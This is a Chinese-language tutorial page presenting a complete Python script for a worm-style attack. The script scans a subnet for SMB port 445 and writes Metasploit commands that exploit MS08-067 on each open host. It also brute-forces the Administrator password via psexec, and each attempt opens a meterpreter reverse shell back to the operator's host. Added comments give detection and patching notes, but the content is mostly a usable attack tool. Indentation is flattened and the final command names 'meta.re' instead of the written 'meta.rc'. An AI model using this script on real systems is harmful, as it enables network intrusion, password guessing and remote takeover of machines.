
【Python腳本進階】2.4、conficker蠕蟲(終)

編輯:Python

完整

該腳本能掃描可能的目標,利用 MS08_067 漏洞,並通過暴力猜測密碼遠程執行一個進程。除了用 nmap 掃描 445 端口之外,腳本本身只是把命令寫入資源文件 meta.rc,再交給 msfconsole 執行。


最後,還要在 main() 函數中添加一些參數解析代碼,然後調用剛才編寫的那些函數,以完成腳本的編寫。

import os
import optparse
import sys
import nmap
# Scan the address range in subNet for TCP port 445 and return the hosts whose
# port state is reported as 'open'.
#
# subNet is handed to nmap.PortScanner.scan() unchanged; main() passes the raw
# -H option value. The return value is a list of host strings taken from
# all_hosts().
#
# NOTE(review): the page flattened this listing's indentation, so block nesting
# is not visible here; presumably the print/append pair sits under the
# state == 'open' test and the return follows the loop -- confirm against the
# original script.
#
# Detection: on the wire this is one source probing 445/tcp on every address
# in the range, i.e. an SMB sweep that flow logs or an IDS can key on.
def findTgts(subNet):
nmScan = nmap.PortScanner()
# Only port 445 (SMB over TCP) is requested from the scanner.
nmScan.scan(subNet, '445')
tgtHosts = []
for host in nmScan.all_hosts():
# Skip hosts whose scan result carries no TCP/445 entry.
if nmScan[host].has_tcp(445):
state = nmScan[host]['tcp'][445]['state']
if state == 'open':
print('[+] Found Target Host:' + host)
tgtHosts.append(host)
return tgtHosts
# Append the listener section to the already-open file object configFile.
#
# Six literal console lines are written in order. lhost and lport are the only
# interpolated values: lport goes through str(), lhost is concatenated as-is
# and therefore has to be a string already.
# Nothing is returned, and the file is neither flushed nor closed here.
#
# Detection: the payload named below is a reverse-TCP one, so a host it runs
# on opens an outbound connection to lhost:lport. Egress filtering and alerts
# on unexpected outbound sessions from servers cover that stage.
def setupHandler(configFile, lhost, lport):
configFile.write('use exploit/multi/handler\n')
configFile.write('setPAYLOAD ' + 'windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
configFile.write('exploit -j -z\n')
configFile.write('setg DisablePayloadHandler 1\n')
# Append one module block for a single host to configFile.
#
# The block names the ms08_067_netapi module, sets RHOST to str(tgtHost) and
# writes the payload, LPORT and LHOST lines; main() passes the same
# lhost/lport values it gave setupHandler. Nothing is returned.
#
# Mitigation: the module targets the flaw fixed by the MS08-067 security
# update, so patched hosts, and hosts whose 445/tcp is not reachable from the
# scanning network, are outside its reach.
def confickerExploit(configFile, tgtHost, lhost, lport):
configFile.write('use exploit/windows/smb/ms08_067_netapi \n')
configFile.write('set RHOST ' +str(tgtHost) +'\n')
configFile.write('set PAYLOAD '+ 'windows/meterpreter/reverse_tcp\n')
configFile. write ('set LPORT ' +str(lport) + '\n')
configFile. write ('set LHOST ' +lhost +'\n')
configFile. write ('exploit -j -z\n')
# Append one psexec module block per line of passwdFile to configFile.
#
# username is fixed to 'Administrator'. Each line of the file, with '\n' and
# '\r' stripped from both ends, becomes the SMBPass value for tgtHost.
# Nothing is returned.
#
# NOTE(review): pF is opened without a context manager and the visible code
# never closes it. The candidate passwords also end up in clear text in the
# generated file.
# NOTE(review): indentation was flattened on the page; presumably every write
# below belongs to the loop body -- confirm against the original script.
#
# Detection: every block is a separate SMB logon as Administrator against the
# same host, which appears in the target's Security log as a run of failed
# network logons (event 4625) for one account from one source address.
def smbBrute(configFile, tgtHost, passwdFile, lhost, lport):
username = 'Administrator'
pF = open( passwdFile, 'r' )
# readlines() loads the whole password list into memory before iterating.
for password in pF.readlines():
password = password.strip('\n').strip('\r')
configFile.write('use exploit/windows/smb/psexec\n')
configFile.write('set SMBUser ' + str(username) + '\n')
configFile.write('set SMBPass ' + str(password) + '\n')
configFile.write('set RHOST ' + str(tgtHost) + '\n')
configFile.write('set PAYLOAD ' + 'windows/meterpreter/reverse_tcp\n')
configFile.write('set LPORT ' + str(lport) + '\n')
configFile.write('set LHOST ' + lhost + '\n')
configFile.write('exploit -j -z\n')
# Command-line entry point: parse the options, scan the target range, write
# the console command file and finally start msfconsole.
#
# Options: -H target address(es) (required), -l listen address (required),
# -p listen port (falls back to '1337'), -F password file (optional).
#
# NOTE(review): indentation was flattened on the page; presumably the
# smbBrute call sits inside the per-host loop (it uses tgtHost) and the
# close()/os.system() pair follows the loop -- confirm against the original.
def main():
# Opened, and therefore truncated, before the options are validated; the
# usage exit below leaves the handle open.
configFile = open('meta.rc', 'w')
parser = optparse.OptionParser('[-] Usage%prog ' + '-H <RHOST[s]> -l <LHOST> [-p <LPORT> -F <Password File>]')
parser.add_option('-H', dest='tgtHost', type='string', help='specify the target address [es]')
parser.add_option('-p', dest='lport', type='string', help='specify the listen port')
parser.add_option('-l', dest='lhost', type = 'string', help='specify the listen address')
parser.add_option('-F', dest='passwdFile', type='string', help='password file for SMB brute force attempt')
(options, args) = parser.parse_args()
# `|` is the bitwise operator; on two bools it gives the same result as
# `or`, only without short-circuiting.
if (options.tgtHost == None) | (options.lhost == None):
print(parser.usage)
# Exit status is 0 even though required options were missing.
exit(0)
lhost = options.lhost
lport = options.lport
if lport == None:
lport = '1337'
passwdFile = options.passwdFile
# The -H value goes to the scanner unchanged; only hosts reported with
# 445/tcp open come back.
tgtHosts = findTgts(options.tgtHost)
# Listener section first, then the per-host blocks.
setupHandler(configFile, lhost, lport)
for tgtHost in tgtHosts:
confickerExploit(configFile, tgtHost, lhost, lport)
# The password-guessing blocks are only written when -F was given.
if passwdFile != None:
smbBrute(configFile, tgtHost, passwdFile, lhost, lport)
configFile.close()
# Runs a fixed command string through the shell; no option value is
# interpolated into it.
os.system('msfconsole -r meta.re')
# Run main() only when the file is executed as a script, not when imported.
if __name__ == '__main__':
main()
